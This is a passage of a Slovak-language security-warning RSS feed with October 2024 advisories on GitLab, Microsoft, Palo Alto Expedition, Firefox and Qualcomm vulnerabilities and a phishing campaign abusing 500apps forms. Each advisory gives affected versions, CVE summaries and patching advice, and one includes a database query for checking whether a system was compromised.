<p><strong>Spoločnosť GitLab vydala aktualizáciu, ktorá opravuje osem zraniteľností. Najzávažnejšie umožňujú vzdialeným útočníkom spustiť CI/CD pipeline na ľubovoľnej vetve repozitára a vykonávať škodlivý kód. Medzi ďalšie závažné zraniteľnosti patrí možnosť realizácie SSRF a XSS útokov, zneprístupnenie služieb a neoprávnený prístup k citlivým údajom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>GitLab Community Edition (CE) staršie ako 17.4.2, 17.3.5, 17.2.9</li>



<li>GitLab Enterprise Edition (EE) staršie ako 17.4.2, 17.3.5, 17.2.9</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-9164</strong> (CVSS skóre 9,6)<br>Kritická zraniteľnosť Gitlab EE CVE-2024-9164 umožňuje <strong>vzdialenému útočníkovi spúšťanie CI/CD</strong> (Continuous Integration/Continuous Delivery) <strong>pipelinov na ľubovoľnej vetve repozitárov a následné vykonanie kódu</strong>.<br><br><strong>CVE-2024-8970</strong> (CVSS skóre 8,2)<br>Zraniteľnosť umožňuje za určitých podmienok útočníkovi spustiť pipeline ako iný používateľ.<br><br><strong>CVE-2024-8977</strong> (CVSS skóre 8,2)<br>Zraniteľnosť umožňuje útoky typu SSRF (Server-Side Request Forgery) na inštanciách GitLab EE, ktoré majú nakonfigurovaný a povolený Product Analytics Dashboard.<br><br><strong>CVE-2024-9631</strong> (CVSS skóre 7,5)<br>Táto zraniteľnosť spôsobuje spomalenie pri prezeraní rozdielov (diffs) v požiadavkách na zlúčenie (merge requests), ktoré obsahujú konflikty.<br><br><strong>CVE-2024-6530</strong> (skóre CVSS 7,3)<br>Zraniteľnosť umožňuje vykonať útok typu XSS (cross-site scripting), ktorý vedie k HTML injekcii na OAuth stránke pri autorizácii novej aplikácie.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Prístup k citlivým informáciám</strong></li>



<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Zneprístupnenie služby (DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia na verziu 17.2.9, 17.3.5 alebo 17.4.2.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://thehackernews.com/2024/10/new-critical-gitlab-vulnerability-could.html">https://thehackernews.com/2024/10/new-critical-gitlab-vulnerability-could.html<span style="font-size:12.0pt;line-height:107%;font-family:&quot;Calibri Light&quot;,sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin"></span></a></li>



<li><a href="https://about.gitlab.com/releases/2024/10/09/patch-release-gitlab-17-4-2-released/">https://about.gitlab.com/releases/2024/10/09/patch-release-gitlab-17-4-2-released/</a></li>



<li><a href="https://arcticwolf.com/resources/blog/cve-2024-9164/">https://arcticwolf.com/resources/blog/cve-2024-9164/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1477/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft Patch Tuesday opravuje 5 zero-day zraniteľností</title>
		<link>/posts/1475</link>
					<comments>/posts/1475#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 11 Oct 2024 12:32:17 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Patch Tuesday]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">/?p=1475</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft v rámci októbrového Patch Tuesday vydala bezpečnostné aktualizácie svojich produktov, ktoré opravujú 118 zraniteľností, z toho 3 kritické,...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft v rámci októbrového Patch Tuesday vydala bezpečnostné aktualizácie svojich produktov, ktoré opravujú 118 zraniteľností, z toho 3 kritické, 5 zero-day a 2 aktívne zneužívané. Zero-day zraniteľnosti umožňujú vzdialené vykonanie kódu, obídenie bezpečnostných prvkov, eskaláciu privilégií a realizáciu útokov falšovaním rôznych prvkov.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>.NET 6.0 installed on Linux</li>



<li>.NET 6.0 installed on Mac OS</li>



<li>.NET 6.0 installed on Windows</li>



<li>.NET 8.0 installed on Linux</li>



<li>.NET 8.0 installed on Mac OS</li>



<li>.NET 8.0 installed on Windows</li>



<li>Azure CLIAzure Monitor Agent</li>



<li>Azure Service Connector</li>



<li>Azure Service Fabric 10.0 for Linux</li>



<li>Azure Service Fabric 10.1 for Linux</li>



<li>Azure Service Fabric 9.1 for Linux</li>



<li>Azure Stack HCI 22H2</li>



<li>Azure Stack HCI 23H2</li>



<li>CBL Mariner 2.0 ARM</li>



<li>CBL Mariner 2.0 x64</li>



<li>DeepSpeed</li>



<li>Microsoft .NET Framework 2.0 Service Pack 2</li>



<li>Microsoft .NET Framework 3.0 Service Pack 2</li>



<li>Microsoft .NET Framework 3.5</li>



<li>Microsoft .NET Framework 3.5 AND 4.7.2</li>



<li>Microsoft .NET Framework 3.5 AND 4.8</li>



<li>Microsoft .NET Framework 3.5 AND 4.8.1</li>



<li>Microsoft .NET Framework 3.5.1</li>



<li>Microsoft .NET Framework 4.6.2</li>



<li>Microsoft .NET Framework 4.6.2/4.7/4.7.1/4.7.2</li>



<li>Microsoft .NET Framework 4.6/4.6.2</li>



<li>Microsoft .NET Framework 4.8</li>



<li>Microsoft 365 Apps for Enterprise for 32-bit Systems</li>



<li>Microsoft 365 Apps for Enterprise for 64-bit Systems</li>



<li>Microsoft Configuration Manager 2303</li>



<li>Microsoft Configuration Manager 2309</li>



<li>Microsoft Configuration Manager 2403</li>



<li>Microsoft Copilot Studio</li>



<li>Microsoft Defender for Endpoint for Linux</li>



<li>Microsoft Edge (Chromium-based)</li>



<li>Microsoft Excel 2016 (32-bit edition)</li>



<li>Microsoft Excel 2016 (64-bit edition)</li>



<li>Microsoft Office 2016 (32-bit edition)</li>



<li>Microsoft Office 2016 (64-bit edition)</li>



<li>Microsoft Office 2019 for 32-bit editions</li>



<li>Microsoft Office 2019 for 64-bit editions</li>



<li>Microsoft Office LTSC 2021 for 32-bit editions</li>



<li>Microsoft Office LTSC 2021 for 64-bit editions</li>



<li>Microsoft Office LTSC 2024 for 32-bit editions</li>



<li>Microsoft Office LTSC 2024 for 64-bit editions</li>



<li>Microsoft Outlook for Android</li>



<li>Microsoft SharePoint Enterprise Server 2016</li>



<li>Microsoft SharePoint Server 2019</li>



<li>Microsoft SharePoint Server Subscription Edition</li>



<li>Microsoft Visual Studio 2015 Update 3</li>



<li>Microsoft Visual Studio 2017 version 15.9 (includes 15.0 &#8211; 15.8)</li>



<li>Microsoft Visual Studio 2019 version 16.11 (includes 16.0 &#8211; 16.10)</li>



<li>Microsoft Visual Studio 2022 version 17.10</li>



<li>Microsoft Visual Studio 2022 version 17.11</li>



<li>Microsoft Visual Studio 2022 version 17.6</li>



<li>Microsoft Visual Studio 2022 version 17.8</li>



<li>Power BI Report Server &#8211; May 2024</li>



<li>Remote Desktop client for Windows Desktop</li>



<li>Visual C++ Redistributable Installer</li>



<li>Visual Studio CodeWindows 10 for 32-bit Systems</li>



<li>Windows 10 for x64-based Systems</li>



<li>Windows 10 Version 1607 for 32-bit Systems</li>



<li>Windows 10 Version 1607 for x64-based Systems</li>



<li>Windows 10 Version 1809 for 32-bit Systems</li>



<li>Windows 10 Version 1809 for x64-based Systems</li>



<li>Windows 10 Version 21H2 for 32-bit Systems</li>



<li>Windows 10 Version 21H2 for ARM64-based Systems</li>



<li>Windows 10 Version 21H2 for x64-based Systems</li>



<li>Windows 10 Version 22H2 for 32-bit Systems</li>



<li>Windows 10 Version 22H2 for ARM64-based Systems</li>



<li>Windows 10 Version 22H2 for x64-based Systems</li>



<li>Windows 11 version 21H2 for ARM64-based Systems</li>



<li>Windows 11 version 21H2 for x64-based Systems</li>



<li>Windows 11 Version 22H2 for ARM64-based Systems</li>



<li>Windows 11 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 23H2 for ARM64-based Systems</li>



<li>Windows 11 Version 23H2 for x64-based Systems</li>



<li>Windows 11 Version 24H2 for ARM64-based Systems</li>



<li>Windows 11 Version 24H2 for x64-based Systems</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li>



<li>Windows Server 2012</li>



<li>Windows Server 2012 (Server Core installation)</li>



<li>Windows Server 2012 R2</li>



<li>Windows Server 2012 R2 (Server Core installation)</li>



<li>Windows Server 2016</li>



<li>Windows Server 2016 (Server Core installation)</li>



<li>Windows Server 2019</li>



<li>Windows Server 2019 (Server Core installation)</li>



<li>Windows Server 2022</li>



<li>Windows Server 2022 (Server Core installation)</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>Spoločnosť Microsoft v rámci októbrového Patch Tuesday vydala bezpečnostné aktualizácie svojich produktov, ktoré opravujú 118 zraniteľností, z toho 3 kritické, 5 zero-day a 2 aktívne zneužívané.<br><br><strong>CVE-2024-43573</strong> (CVSS skóre 6,5)<br>Aktívne zneužívaná zero-day zraniteľnosť platformy MSHTML, ktorá umožňuje falšovať isté prvky. Bližšie informácie o tejto chybe Microsoft nezverejnil.<br><br><strong>CVE-2024-43572</strong> (CVSS skóre 7,8)<br>Aktívne zneužívaná zero-day zraniteľnosť Microsoft Management Saved Console, ktorá umožňuje vzdialené vykonávanie kódu prostredníctvom súborov MSC. Oprava tejto chyby zamedzuje otvoreniu MSC súborov z nedôveryhodných zdrojov.<br><br><strong>CVE-2024-6197</strong> (CVSS skóre 7,5)<br>Zero-day zraniteľnosť v knižnici <em>libcurl</em>. Funkcia knižnice <em>utf8asn1str()</em> spracúva reťazce typu ASN.1 UTF-8 spôsobom, ktorý vedie k možnosti prepísania častí pamäte na zásobníku. To môže spôsobiť pád aplikácie. Chyba môže mať potenciál aj pre iné spôsoby zneužitia. Zraniteľnosť môže útočník zneužiť pomocou servera pod svojou kontrolou, ktorý poskytne zraniteľnej inštancii špeciálne upravený TLS certifikát.<br><br><strong>CVE-2024-20659</strong> (CVSS skóre 7,1)<br>Zero-day zraniteľnosť Hyper-V, ktorá umožňuje obchádzať bezpečnostné prvky. Útočník s lokálnym prístupom ku zraniteľnej inštancii na špecifickom hardvéri môže obísť zabezpečenie UEFI a získať kontrolu nad hypervízorom a zabezpečeným jadrom. Potrebuje na to vykonať reštart zadiadenia.<br><br><strong>CVE-2024-43583</strong> (CVSS skóre 7,8)<br>Zero-day zraniteľnosť Winlogon, ktorá umožňuje zvýšenie oprávnení v OS na úroveň SYSTEM. Bližšie informácie o tejto chybe Microsoft nezverejnil.<br><br>Ostatné zraniteľnosti možno zneužiť na eskaláciu privilégií, obídenie bezpečnostných prvkov, vzdialené vykonanie kódu, získanie neoprávneného prístupu k citlivým údajom, zneprístupnenie služby a falšovanie rôznych prvkov.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Obídenie bezpečnostných prvkov</strong></li>



<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Falšovanie prvkov<span style="font-family:&quot;Calibri&quot;,sans-serif;mso-ascii-theme-font:minor-latin;
mso-hansi-theme-font:minor-latin;mso-bidi-theme-font:minor-latin;color:black;
mso-bidi-font-weight:normal"></span></strong></li>



<li><strong>Nedostupnosť služby (DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aplikácia záplat októbrového balíka Microsoft Patch Tuesday.<br><br>Zraniteľnosť CVE-2024-43583 odporúča Microsoft mitigovať povolením oficiálneho Microsoft IME (Input Method Editor). To zabráni zneužitiu potenciálne zraniteľných IME tretích strán.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Oct">https://msrc.microsoft.com/update-guide/releaseNote/2024-Oct<span style="font-size:12.0pt;line-height:107%;mso-bidi-font-family:Calibri;
mso-bidi-theme-font:minor-latin"></span></a></li>



<li><a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-october-2024-patch-tuesday-fixes-5-zero-days-118-flaws/">https://www.bleepingcomputer.com/news/microsoft/microsoft-october-2024-patch-tuesday-fixes-5-zero-days-118-flaws/</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-43573">https://nvd.nist.gov/vuln/detail/CVE-2024-43573</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-43572">https://nvd.nist.gov/vuln/detail/CVE-2024-43572</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-6197">https://nvd.nist.gov/vuln/detail/CVE-2024-6197</a></li>



<li><a href="https://curl.se/docs/CVE-2024-6197.html">https://curl.se/docs/CVE-2024-6197.html</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-20659">https://nvd.nist.gov/vuln/detail/CVE-2024-20659</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-6197">https://nvd.nist.gov/vuln/detail/CVE-2024-6197</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1475/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Phishingové kampane zneužívajú legitímne služby 500apps.com</title>
		<link>/posts/1468</link>
					<comments>/posts/1468#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 10 Oct 2024 13:30:38 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[500apps]]></category>
		<category><![CDATA[Phishing]]></category>
		<guid isPermaLink="false">/?p=1468</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/500apps.png" alt="" /></p>Kybernetickí útočníci stále hľadajú nové spôsoby pre spoľahlivejšie šírenie podvodného a&#160;škodlivého obsahu a&#160;obídenie jeho detekcie. Okrem ľubovoľných prenajatých domén preto...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/500apps.png" alt="" /></p>
<p>Kybernetickí útočníci stále hľadajú nové spôsoby pre spoľahlivejšie šírenie podvodného a&nbsp;škodlivého obsahu a&nbsp;obídenie jeho detekcie. Okrem ľubovoľných prenajatých domén preto už dlhodobo využívajú pre umiestnenie svojho obsahu tiež legitímne webové služby, ktoré nie je možné prakticky blokovať, pretože ich používajú samotné organizácie, ktoré sa stávajú cieľmi ich útokov.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="624" src="/wp-content/uploads/2024/10/500apps-01-1024x624.png" alt="" class="wp-image-1469" style="width:543px;height:auto"/></figure></div>


<p><strong>Čo je služba 500apps.com?</strong></p>



<p>Jedná sa o&nbsp;balík webových služieb a&nbsp;aplikácií pre potreby podnikov a organizácií, ktoré ponúka spoločnosť 500apps. Balík obsahuje aplikácie pre správu procesov oddelení HR, marketingu, predaja, podpory, vývoja, a&nbsp;tiež rôzne kolaboratívne platformy.</p>



<p><strong>Ako ju zneužívajú útočníci?</strong></p>



<p>Útočníci zneužívajú najčastejšie službu forms.io na vytváranie nelegálnych webových formulárov, ktoré zbierajú prihlasovacie údaje a&nbsp;iné citlivé informácie od obetí. Príkladom sú formuláre imitujúce prihlasovacie rozhrania do e-mailových účtov. Formuláre doručujú obetiam formou phishingových e-mailov, častokrát odoslaných z&nbsp;kompromitovanej dôveryhodnej e-mailovej schránky.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="712" src="/wp-content/uploads/2024/10/500apps-02-1024x712.png" alt="" class="wp-image-1470" style="width:512px;height:auto"/></figure></div>

<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="639" src="/wp-content/uploads/2024/10/500apps-03-1024x639.png" alt="" class="wp-image-1471" style="width:678px;height:auto"/></figure></div>


<p><strong>Blokovať či neblokovať?</strong></p>



<p>Balík služieb 500apps.com používa množstvo verejných aj súkromných organizácií. Preto nie je praktickým riešením službu plošne blokovať. Ak vo svojej organizácii tento balík nevyužívate a nepredpokladáte, že by ich využívali vaši partneri pri komunikácii s vami, môžete zvážiť blokovanie domény v rámci svojej organizácie.<br><br>Pred blokovaním IP adries, na ktorých sú phishingové formuláre hostované, odporúčame preveriť jej majiteľa. Útočníci totiž niekedy zneužívajú IP adresy spoločností ako Google. Môžete tak odrezať prístup pre ďalšie legitímne služby.</p>



<p><strong>Ako sa účinne brániť?</strong></p>



<p>Voči phishingovým kampaniam je najúčinnejšia obrana zvyšovanie povedomia vašich používateľov. Útoky stratia účinnosť, pokiaľ dokážu zamestnanci identifikovať&nbsp;podvodné správy a zneužité služby. Na to slúžia najmä školenia a&nbsp;preventívne phishingové testy, kde sa používatelia naučia na konkrétnych príkladoch a&nbsp;v&nbsp;praxi rozlišovať legitímny a&nbsp;škodlivý obsah (screenshoty, škodlivé odkazy, hlavné rozlišovacie znaky, a podobne).</p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://500apps.com/">https://500apps.com/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1468/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti Palo Alto Networks Expedition</title>
		<link>/posts/1465</link>
					<comments>/posts/1465#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 10 Oct 2024 13:24:14 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Palo Alto]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1465</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/palo-alto-networks-inc-logo-vector.png" alt="" /></p>Spoločnosť Palo Alto Networks vydala bezpečnostné aktualizácie, ktoré opravujú viacero zraniteľností v produkte Expedition. Zraniteľnosti možno zneužiť na SQL injekciu,...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/palo-alto-networks-inc-logo-vector.png" alt="" /></p>
<p><strong>Spoločnosť Palo Alto Networks vydala bezpečnostné aktualizácie, ktoré opravujú viacero zraniteľností v produkte Expedition. Zraniteľnosti možno zneužiť na SQL injekciu, realizáciu XSS útokov, získanie neoprávneného prístupu k citlivým údajom a čítanie a zápis ľubovoľných súborov na súborovom systéme Expedition. Útočníci môžu získať schopnosť vzdialene vykonať škodlivý kód a získať úplnú kontrolu nad firewallmi s operačným systémom PAN-OS. Spoločnosť po aktualizácii odporúča vykonať aj zmenu prihlasovacích údajov a ďalšieho kryptografického materiálu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Palo Alto Networks Expedition verzie staršie ako 1.2.96</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>Spoločnosť Palo Alto Networks vydala bezpečnostné aktualizácie, ktoré opravujú viacero kritických a vysoko závažných zraniteľností v produkte Expedition. Ich zneužitím môže útočník vzdialene vykonať škodlivý kód a získať úplnú kontrolu nad firewallmi s operačným systémom PAN-OS. Pre zraniteľnosť CVE-2024-9464 je dostupný proof-of-concept kód demonštrujúci získanie možnosti vykonávať systémové príkazy na zraniteľnej inštancii bez autentifikácie po zreťazení so staršou CVE-2024-5910, ktorá umožňuje resetovať administrátorské účty.<br><br><strong>CVE-2024-9463</strong> (CVSSv4 skóre 9,9)<br><br>Neautentifikovaný útočník môže vykonávať systémové príkazy v Expedition s oprávneniami používateľa root. Môže tak získať prihlasovacie údaje, konfiguráciu a API kľúče firewallov s PAN-OS.<br><br><strong>CVE-2024-9464</strong> (CVSSv4 skóre 9,3)<br><br>Autentifikovaný útočník môže vykonávať systémové príkazy v Expedition s oprávneniami používateľa root. Môže tak získať prihlasovacie údaje, konfiguráciu a API kľúče firewallov s PAN-OS.<br><br><strong>CVE-2024-9465</strong> (CVSSv4 skóre 9,2)<br><br>Neautentifikovaný útočník môže v systéme Expedition vykonávať útoky typu SQL injection a získavať citlivé informácie z databázy, vrátane používateľských mien, hashov hesiel a API kľúčov a konfigurácie zariadení. Môže tiež čítať a vytvárať ľubovoľné súbory v Expedition.<br><br><strong>CVE-2024-9466</strong> (CVSSv4 skóre 8,2)<br><br>Autentifikovaný útočník má v systéme Expedition kvôli nezabezpečenému spôsobu ukladanie citlivých údajov prístup k nešifrovaným prihlasovacím údajom a API kľúčom firewallov.<br><br><strong>CVE-2024-9467</strong> (CVSSv4 skóre 7,0)<br><br>Na prehliadač systému Expedition je možné urobiť útok typu reflected XSS a úspešne vykonať škodlivý kód JavaScript. Útočník môže ukradnúť reláciu prihláseného používateľa. Obeť musí kliknúť na škodlivý odkaz.<br><br>Zraniteľnosti objavili výskumníci Zach Hanley z Horizon3.ai a Enrique Castillo z Palo Alto Networks.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Prevzatie kontroly nad firewallmi</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Palo Alto Networks Expedition aspoň na verziu 1.2.96. Spoločnosť po aktualizácii odporúča vykonať aj zmenu prihlasovacích údajov a ďalšieho kryptografického materiálu na Expedition aj firewalle.<br><br>Pokiaľ aktualizácia nie je možná, vypnite Expedition alebo obmedzte k nemu prístup na dôveryhodné zdroje.<br><br>Overte zneužitie zraniteľnosti CVE-2024-9465 pomocou príkazu <em>mysql -uroot -p -D pandb -e &#8220;SELECT * FROM cronjobs;</em> (<em>root</em> predstavuje názov účtu). Záznamy vyhovujúce tomuto dopytu môžu predstavovať dôkaz kompromitácie vášho systému Expedition. Upozorňujeme, že neprítomnosť takýchto záznamov neznamená, že systém nebol kompromitovaný.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://security.paloaltonetworks.com/PAN-SA-2024-0010">https://security.paloaltonetworks.com/PAN-SA-2024-0010</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-firewall-hijack-bugs-with-public-exploit/">https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-firewall-hijack-bugs-with-public-exploit/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1465/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná RCE zraniteľnosť Firefox</title>
		<link>/posts/1463</link>
					<comments>/posts/1463#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 10 Oct 2024 07:19:37 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1463</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/03/Mozilla_Firefox_logo_2013.svg-min-1024x910.png" alt="" /></p>Spoločnosť Mozilla opravila vo svojom prehliadači kritickú aktívne zneužívanú zraniteľnosť. Jej zneužitím získajú útočníci možnosť vzdialene vykonávať kód. Zraniteľné systémy:...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/03/Mozilla_Firefox_logo_2013.svg-min-1024x910.png" alt="" /></p>
<p><strong>Spoločnosť Mozilla opravila vo svojom prehliadači kritickú aktívne zneužívanú zraniteľnosť. Jej zneužitím získajú útočníci možnosť vzdialene vykonávať kód.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Firefox verzie staršie ako 131.0.2</li>



<li>Firefox ESR verzie staršie ako 115.16.1 a 128.3.1</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-9680</strong> (CVSS skóre 9,8)</p>



<p>Kritická aktívne zneužívaná zero-day zraniteľnosť v rozhraní AnimationTimeline prehliadačov Firefox a Firefox ESR, umožňuje útočníkom vzdialene vykonávať kód. Zraniteľnosť súvisí s možnosťou použitia dealokovaného miesta v pamäti.<br><br>AnimationTimeline je súčasťou Firefox Web Animations API a slúži na kontrolu a synchronizáciu animovaných prvkov na webstránkach.<br><br>Zraniteľnosť objavil výskumník Damien Schaeffer zo spoločnosti ESET.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Firefox na verziu 131.0.2 a Firefox ESR na verziu 115.16.1 alebo 128.3.1.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.bleepingcomputer.com/news/security/mozilla-fixes-firefox-zero-day-actively-exploited-in-attacks/">https://www.bleepingcomputer.com/news/security/mozilla-fixes-firefox-zero-day-actively-exploited-in-attacks/</a></li>



<li><a href="https://thehackernews.com/2024/10/mozilla-warns-of-active-exploitation-in.html?m=1">https://thehackernews.com/2024/10/mozilla-warns-of-active-exploitation-in.html?m=1</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-9680">https://nvd.nist.gov/vuln/detail/CVE-2024-9680</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1463/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické a zero-day zraniteľnosti čipov Qualcomm</title>
		<link>/posts/1428</link>
					<comments>/posts/1428#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 09 Oct 2024 12:13:48 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Memory corruption]]></category>
		<category><![CDATA[Qualcomm]]></category>
		<guid isPermaLink="false">/?p=1428</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/qualcomm-logo.png" alt="" /></p>Spoločnosť QUALCOMM vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť v službe DSP (Digital Signal Processor) využívanej vo viacerých...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/qualcomm-logo.png" alt="" /></p>
<p><strong>Spoločnosť QUALCOMM vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť v službe DSP (Digital Signal Processor) využívanej vo viacerých chipsetoch a kritickú zraniteľnosť v komponente WLAN Resource Manager.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Qualcomm Digital Signal Processor (DSP)</li>



<li>Qualcomm WLAN Resource Manager</li>
</ul>



<p><em>Kompletný prehľad zraniteľných chipsetov sa nachádza <a href="https://docs.qualcomm.com/product/publicresources/securitybulletin/october-2024-bulletin.html" data-type="link" data-id="https://docs.qualcomm.com/product/publicresources/securitybulletin/october-2024-bulletin.html">tu</a>.</em></p>



<p><strong>Opis činnosti:</strong></p>



<p>Spoločnosť Qualcomm opravila v októbri 2024 20 zraniteľností vo svojich produktoch. Z toho je jedna hodnotená ako kritická, 12 vysoko a 7 stredne závažné. Jednu zraniteľnosť aktívne zneužívajú útočníci pri cielených útokoch.<br><br><strong>CVE-2024-43047</strong> (CVSS skóre 7,8)<br><br>Aktívne zneužívaná zero-day zraniteľnosť v službe DSP (Digital Signal Processor), ktorú využívajú viaceré chipsety. CVE-2024-43047 spočíva v opätovnom použití uvoľneného miesta v pamäti a lokálny útočník s nízkymi oprávneniami by ju mohol zneužiť na poškodenie pamäte.<br><br>Chybu objavil Seth Jenkins z Google Project Zero a Conghui Wang z Amnesty International Security Lab.<br><br><strong>CVE-2024-33066</strong> (CVSS skóre 9,8)<br><br>Kritická zraniteľnosť WLAN Resource Manager, ktorá bola objavená pred rokom, spočíva v nedostatočnom overovaní vstupov a možno ju zneužiť na poškodenie pamäte.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Poškodenie pamäte</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Qualcomm odporúča bezodkladnú aktualizáciu firmvéru (ovládač FASTRPC) zraniteľných chipsetov.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://docs.qualcomm.com/product/publicresources/securitybulletin/october-2024-bulletin.html">https://docs.qualcomm.com/product/publicresources/securitybulletin/october-2024-bulletin.html<span style="font-family:&quot;Calibri&quot;,sans-serif;mso-ascii-theme-font:minor-latin;
mso-hansi-theme-font:minor-latin;mso-bidi-theme-font:minor-latin;color:black;
font-weight:normal;mso-bidi-font-weight:bold"></span></a></li>



